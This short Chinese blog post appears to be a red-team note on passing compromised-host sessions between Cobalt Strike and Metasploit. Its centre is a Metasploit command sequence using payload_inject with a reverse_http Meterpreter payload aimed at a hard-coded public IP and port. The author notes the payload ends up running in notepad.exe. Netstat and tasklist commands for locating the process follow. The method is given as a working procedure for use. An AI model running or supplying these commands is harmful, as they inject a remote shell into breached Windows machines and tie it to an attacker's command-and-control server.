这篇文章上次修改于 185 天前,可能其部分内容已经发生变化,如有疑问可询问作者。
cs移交到msf
msf上run一下就有meterpreter了
msf移交到cs
我这边显示走的是notepad.exe进程
简单说就是将msf的payload构造成cs的某个监听器的样子,然后run就好了,记住这里set payload的协议要设置成和cs一样的,
也最好和最初上线的那个协议是一样的才比较稳妥。
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 5566 cs监听器的端口
set lhost 101.37.160.211 cs的ip
set session 1 导入session
exploit
不过回弹的session的延迟挺高的,因为又多走了一层
netstat -ano
找到对应的PID然后tasklist /svc找到和PID对应的exe,打开任务管理器
右键定位exe的位置
没有评论